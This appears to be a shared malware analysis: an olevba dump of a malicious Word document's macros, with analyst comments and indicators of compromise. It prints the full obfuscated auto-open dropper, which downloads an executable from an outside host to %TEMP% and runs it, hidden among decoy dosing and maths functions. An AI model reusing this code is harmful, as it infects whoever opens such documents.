dynamoo

Malicious Word macro

Jun 5th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 1445942147T0.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 1445942147T0.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
' Second hop of the auto-open chain: autoopen calls DcdAC(3); the Long
' argument is never read and the body just jumps to the downloader
' lhwtbkfTu5jYB in Module1F3. The unused parameter and the extra hop
' presumably exist only to defeat simple "AutoOpen directly calls X"
' heuristics - the behaviour is identical to calling lhwtbkfTu5jYB.
Sub DcdAC(FFFFF As Long)

lhwtbkfTu5jYB
End Sub
  20.  
' Entry point. VBA procedure names are case-insensitive, so "autoopen" is
' the AutoOpen auto-executable that olevba lists under AutoExec: it runs
' as soon as the document is opened with macros enabled. The only thing it
' does is call DcdAC, which in turn runs the downloader lhwtbkfTu5jYB.
' Mitigation: blocking macros from the internet / untrusted documents
' prevents this chain from starting at all.
Sub autoopen()

DcdAC (3)

End Sub
  26.  
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. ANALYSIS:
  29. +----------+----------+---------------------------------------+
  30. | Type     | Keyword  | Description                           |
  31. +----------+----------+---------------------------------------+
  32. | AutoExec | AutoOpen | Runs when the Word document is opened |
  33. +----------+----------+---------------------------------------+
  34. -------------------------------------------------------------------------------
  35. VBA MACRO M11.bas
  36. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/M11'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38.  
  39. Public Sub ParseResponse(scanner_name, json)
  40.  
  41.     scanner = scanner_name
  42.    
  43.     '"detected": false, "version": "11.00", "result": null, "update": "20110421"
  44.    
  45.     On Error Resume Next
  46.     Dim a As Long, b As Long
  47.     Dim main As String, name As String, value As String, scans As String
  48.    
  49.     tmp = Split(json, ",")
  50.     For Each entry In tmp
  51.         entry = Trim(entry)
  52.         If Len(entry) = 0 Then GoTo nextone
  53.         b = InStr(1, entry, ":")
  54.         If b < 2 Then GoTo nextone
  55.         name = Mid(entry, 1, b - 1)
  56.         value = Mid(entry, b + 1)
  57.         If name = "result" And detected = True Then Stop
  58.        
  59. nextone:
  60.     Next
  61.    
  62.     DoEvents
  63.    
  64.  
  65. End Sub
  66.  
  67.  
  68.     Public Function AgExtIntInterval(ByVal CrClStd As Double) As Double
  69.         Select Case CrClStd
  70.             Case My.Forms.FrmCalculator.Q241 To My.Forms.FrmCalculator.Q242
  71.                 AgExtIntInterval = 24
  72.             Case My.Forms.FrmCalculator.Q361 To My.Forms.FrmCalculator.Q362
  73.                 AgExtIntInterval = 36
  74.             Case My.Forms.FrmCalculator.Q481 To My.Forms.FrmCalculator.Q482
  75.                 AgExtIntInterval = 48
  76.         End Select
  77.     End Function
  78.  
  79.  
  80.  
  81. 'Hyperbolic Sin
  82. Public Function HSin(x As Double) As Double
  83. HSin = CDbl((Exp(x) - Exp(-x)) / 2)
  84. End Function
  85.  
  86.  
  87.     Public Function CrClStd(ByVal CrCl As Double, ByVal BSA As Double) As Double
  88.         CrClStd = CrCl * (1.73 / BSA)
  89.     End Function
  90.  
  91.     Public Function RoundToSignificance(ByVal number As Integer, _
  92.         ByVal roundtonearest As Integer) As Integer
  93.         'Round number up or down to the nearest multiple of significance
  94.        Dim d As Double
  95.         d = number / roundtonearest
  96.         d = Math.Round(d, 0)
  97.         RoundToSignificance = d * roundtonearest
  98.     End Function
  99.  
  100.     Public Function TOneHalf(ByVal K As Double) As Double
  101.         TOneHalf = 0.693 / K
  102.     End Function
  103.  
  104.     Public Function GentKEst(ByVal CrCl As Double) As Double
  105.         GentKEst = (0.00293 * CrCl) + 0.014
  106.     End Function
  107.  
  108.  
  109.  
  110.  
  111.  
  112. 'Cos
  113. Public Function CosTheta(x As Double) As Double
  114. CosTheta = Cos((Pi / 180) * CDbl(x))
  115. End Function
  116.  
  117.     Public Function IBWMale(ByVal PtHeightinInches As Double) As Double
  118.         IBWMale = 50 + (2.3 * (PtHeightinInches - 60))
  119.     End Function
  120.  
  121.     Public Function IBWFemale(ByVal PtHeightinInches As Double) As Double
  122.         IBWFemale = 45.5 + (2.3 * (PtHeightinInches - 60))
  123.     End Function
  124.  
  125.  
  126.  
  127.  Public Function CCGFemale(ByVal PtAge As Double, ByVal Weight As Double, ByVal SCr As Double) As Double
  128.         CCGFemale = (((140 - PtAge) * Weight) / (72 * SCr)) * 0.85
  129.     End Function
  130.  
' Execution stage of the dropper. The Chr() concatenation below spells
' "Shell.Application"; its Open method is then invoked on AZEJp3Mz, the
' %TEMP% path that lhwtbkfTu5jYB saved the download to, which runs the
' dropped file. The String parameter is never read - it only makes the
' call site look like a lookup. Reached from the error handler in
' lhwtbkfTu5jYB, not called directly.
' Detection: WINWORD.EXE launching an executable from the user's temp
' directory is the observable here.
Public Function SHKY9cJRiD8Mm(PrtV2KcZsYjCTZ As String)
    ' uhjejFduWS is the CreateObject wrapper defined just below
    Set ZhWWs4Kjk = uhjejFduWS("S" & Chr(104) & Chr(101) & "l" & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i" & "o" & Chr(110))
' Shell.Application.Open on an .exe path executes it
ZhWWs4Kjk.Open (AZEJp3Mz)
End Function
' Indirection around CreateObject. Callers pass a ProgID assembled from
' Chr() pieces at run time, so CreateObject never appears next to a
' readable class name in the source (olevba still flags the keyword).
' Used in this document for Microsoft.XMLHTTP, WScript.Shell, Adodb.Stream
' and Shell.Application.
Public Function uhjejFduWS(A5D3i3tyZ As String)
    Set uhjejFduWS = CreateObject(A5D3i3tyZ)
End Function
  138.     Public Function JelliffeMale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
  139.         JelliffeMale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73))
  140.     End Function
  141.  
  142.     Public Function JelliffeFemale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
  143.         JelliffeFemale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73)) * 0.9
  144.     End Function
  145.  
' File-write stage of the dropper: persists a byte array to disk through
' ADODB.Stream so that no VBA Open/Put statement appears in the source.
' The Chr() concatenation decodes to "Adodb.Stream".
'   zeXN04TOAASAo2 - bytes to write (the HTTP responseBody in the caller)
'   HlIR1pypwM56D0 - destination path (the %TEMP%\ridebos5.exe path built
'                    in lhwtbkfTu5jYB)
' No return value is assigned. Detection: Word writing a file named *.exe
' into the user's temp directory.
Public Function oDMPcMtKN938lx(zeXN04TOAASAo2 As Variant, HlIR1pypwM56D0 As String)
Dim sZSYhIPY3: Set sZSYhIPY3 = uhjejFduWS("A" & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & Chr(97) & Chr(109))

With sZSYhIPY3
   .Type = 1                          ' adTypeBinary
    .Open
    .write zeXN04TOAASAo2
    .savetofile HlIR1pypwM56D0, 2     ' adSaveCreateOverWrite: replaces any existing file
End With
End Function
    ' Filler code from the VB.NET dosing-calculator decoy: multiplies the
    ' ExtInt value read from the FrmCalculator form by DosingWeight and
    ' narrows the result to Integer on assignment (rounding; out-of-range
    ' products overflow). NOTE(review): ExtInt's type is not visible in
    ' this dump - presumably numeric.
    Public Function AgExtIntDose(ByVal DosingWeight As Double) As Integer
        AgExtIntDose = My.Forms.FrmCalculator.ExtInt * DosingWeight
    End Function
  159. Public Function PaddedScanner(Optional bufSz As Long = 20) As String
  160.     Dim tmp As String
  161.     tmp = scanner
  162.     While Len(tmp) < bufSz
  163.         tmp = tmp & " "
  164.     Wend
  165.     PaddedScanner = tmp
  166. End Function
  167.  
  168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  169. ANALYSIS:
  170. +------------+----------------+-----------------------------------------+
  171. | Type       | Keyword        | Description                             |
  172. +------------+----------------+-----------------------------------------+
  173. | Suspicious | Open           | May open a file                         |
  174. | Suspicious | Chr            | May attempt to obfuscate specific       |
  175. |            |                | strings                                 |
  176. | Suspicious | CreateObject   | May create an OLE object                |
  177. | Suspicious | SaveToFile     | May create a text file                  |
  178. | Suspicious | Write          | May write to a file (if combined with   |
  179. |            |                | Open)                                   |
  180. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  181. |            |                | be used to obfuscate strings (option    |
  182. |            |                | --decode to see all)                    |
  183. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  184. |            |                | may be used to obfuscate strings        |
  185. |            |                | (option --decode to see all)            |
  186. +------------+----------------+-----------------------------------------+
  187. -------------------------------------------------------------------------------
  188. VBA MACRO Module1F3.bas
  189. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/Module1F3'
  190. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Globals shared by the dropper stages in this document.
' OIHoihoih - download URL, assembled from Chr() pieces in lhwtbkfTu5jYB
Public OIHoihoih As String



' AZEJp3Mz - full path of the dropped file under %TEMP%, set in
'            lhwtbkfTu5jYB and later opened (executed) by SHKY9cJRiD8Mm
Public AZEJp3Mz As String
' Used only by the filler trigonometry helpers for degree conversions
Public Const Pi = 3.14159265358979
  197. 'Sin
  198.  
  199. 'Inverse Secant
  200. Public Function ISec(x As Double) As Double
  201. ISec = CDbl((180 / Pi) * Atn(x / Sqr(x * x - 1))) + Sgn((x) - 1) * (2 * CDbl((180 / Pi) * Atn(1)))
  202. End Function
  203. 'Inverse Cotangent
  204. Public Function ICot(x As Double) As Double
  205. ICot = CDbl((180 / Pi) * Atn(x)) + 2 * CDbl((180 / Pi) * Atn(1))
  206. End Function 'Hyperbolic Secant
  207.  
  208.  
  209. Public Function HSec(x As Double) As Double
  210. HSec = CDbl(2 / (Exp(x) - Exp(-x)))
  211. End Function
  212. 'Hyperbolic Cotangent
  213. Public Function HCotan(x As Double) As Double
  214. HCotan = CDbl((Exp(x) + Exp(-x)) / (Exp(x) - Exp(-x)))
  215. End Function
  216.  
  217.  
  218.  
  219.  
  220. 'Inverse Hyperbolic Sine
  221. Public Function IHSin(x As Double) As Double
  222. IHSin = CDbl(Log(x + Sqr(x * x + 1)))
  223. End Function
  224. 'Inverse Hyperbolic Cos
  225. Public Function IHCos(x As Double) As Double
  226. IHCos = CDbl(Log(x + Sqr(x * x - 1)))
  227. End Function
  228. 'Inverse Hyperbolic Tangent
  229.  
  230. Public Function IHTan(x As Double) As Double
  231. IHTan = CDbl(Log((1 + x) / (1 - x)) / 2)
  232. End Function
  233. 'Inverse Hyperbolic Secant
  234. Public Function IHSec(x As Double) As Double
  235. IHSec = CDbl(Log((Sqr(-x * x + 1) + 1) / x))
  236. End Function
  237.  
  238.  
  239.  
  240.  
' Downloader stage of the dropper (reached via autoopen -> DcdAC). Every
' string below is assembled from Chr() calls and one-character literals so
' that the COM class names, method names and URL never appear as readable
' text in the VBA source; the decoded values are given in the comments.
' Observable behaviour, in order: an HTTP GET of the URL below through
' Microsoft.XMLHTTP, the response body written to %TEMP%\ridebos5.exe
' through ADODB.Stream, then a deliberate division by zero that routes
' execution into the error handler, which launches the file via
' Shell.Application. This macro sets up no persistence of its own; the
' dropped file is the payload to chase.
Sub lhwtbkfTu5jYB()
' Decodes to the download URL: hxxp://g600424[.]ferozo[.]com/25/10[.]exe (IoC)
OIHoihoih = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "g" & "6" & Chr(48) & Chr(48) & "0" & "4" & "2" & Chr(52) & Chr(46) & Chr(102) & Chr(101) & "r" & "o" & Chr(122) & Chr(111) & Chr(46) & "c" & "o" & "m" & Chr(47) & Chr(50) & "5" & Chr(47) & Chr(49) & Chr(48) & Chr(46) & "e" & Chr(120) & Chr(101)
' Decodes to "Microsoft.XMLHTTP" - the HTTP client object
Set efAv8tqEYv = uhjejFduWS(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
    ' async flag for the Open call below: False = synchronous request
    JGHfvkj = False




' Decodes to "WScript.Shell"; used only to read the process environment
Set dhKI3Zii1 = uhjejFduWS("W" & Chr(83) & Chr(99) & "r" & Chr(105) & Chr(112) & Chr(116) & Chr(46) & "S" & Chr(104) & "e" & Chr(108) & "l")

' "Environment" (the empty "" pieces are padding)
kJBFN = "E" & Chr(110) & "" & Chr(118) & Chr(105) & "" & "" & "" & "" & Chr(114) & "o" & "n" & "m" & Chr(101) & "n" & "t"
' "Process"
LKNlk = Chr(80) & Chr(114) & Chr(111) & "" & "" & "" & Chr(99) & "e" & Chr(115) & Chr(115)
' shell.Environment("Process") - the current process environment block;
' CallByName hides the property name from static scanning
Set GA0VCrFE = CallByName(dhKI3Zii1, kJBFN, VbGet, LKNlk)

' Reads the TEMP variable, i.e. the user's temp directory
IjyE6UGLtZa = GA0VCrFE(Chr(84) & "E" & Chr(77) & Chr(80))

' Drop path: <TEMP>\ridebos5.exe (Chr(92) is the backslash)
AZEJp3Mz = IjyE6UGLtZa & Chr(92) & "r" & Chr(105) & Chr(100) & Chr(101) & Chr(98) & "o" & Chr(115) & Chr(53) & Chr(46) & Chr(101) & "x" & Chr(101)
' http.Open "GET", <url>, False
CallByName efAv8tqEYv, "O" & Chr(112) & "e" & Chr(110), VbMethod, "" & "G" & Chr(69) & "" & "" & "" & Chr(84), OIHoihoih, JGHfvkj

Dim TMz47GycIf() As Byte

' http.Send
CallByName efAv8tqEYv, "S" & Chr(101) & Chr(110) & Chr(100), VbMethod
' TMz47GycIf = http.responseBody - raw bytes of the downloaded file
TMz47GycIf = CallByName(efAv8tqEYv, Chr(114) & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & "e" & Chr(66) & "o" & Chr(100) & "y", VbGet)
' Writes the bytes to the drop path via ADODB.Stream (see oDMPcMtKN938lx)
oDMPcMtKN938lx TMz47GycIf, AZEJp3Mz
' Control-flow trick: the division by zero is intentional. It raises a
' runtime error so execution lands in the handler below, which hides the
' call to the execution stage behind an error path rather than a plain
' call after the download.
On Error GoTo Vo7uJ9Tj6G
    a = 332 / 0
  On Error GoTo 0

xKyUc77k:
  Exit Sub
Vo7uJ9Tj6G:
  ' Launches the dropped file; the String argument is ignored by the callee
  SHKY9cJRiD8Mm ("SUIBVc7Pfr")
Resume xKyUc77k
End Sub
  275.  
  276.  
  277. Public Function Sine(x As Double) As Double
  278. Sine = Sin((Pi / 180) * CDbl(x))
  279. End Function
  280.  
  281. 'Inverse Hyperbolic Cosecant
  282. Public Function IHCosec(x As Double) As Double
  283. IHCosec = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
  284. End Function
  285.  
  286.  
  287. 'Inverse Hyperbolic Cotangent
  288. Public Function IHCot(x As Double) As Double
  289. IHCot = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
  290. End Function
  291.  
  292.  
  293. '********************************************************************
  294. '
  295. '   OTHER USEFUL FUNCTIONS
  296. '
  297. '********************************************************************
  298. Public Function Power(x As Double, Y As Double) As Double
  299. Power = x ^ Y
  300. End Function
  301.  
  302. Public Function LogN(Base As Double, x As Double) As Double
  303. LogN = Log(x) / Log(Base)
  304. End Function
  305. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  306. ANALYSIS:
  307. +------------+-------------+-----------------------------------------+
  308. | Type       | Keyword     | Description                             |
  309. +------------+-------------+-----------------------------------------+
  310. | Suspicious | Chr         | May attempt to obfuscate specific       |
  311. |            |             | strings                                 |
  312. | Suspicious | CallByName  | May attempt to obfuscate malicious      |
  313. |            |             | function calls                          |
  314. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  315. |            |             | be used to obfuscate strings (option    |
  316. |            |             | --decode to see all)                    |
  317. +------------+-------------+-----------------------------------------+
  318. -------------------------------------------------------------------------------
  319. VBA MACRO Module2.bas
  320. in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/Module2'
  321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  322. (empty macro)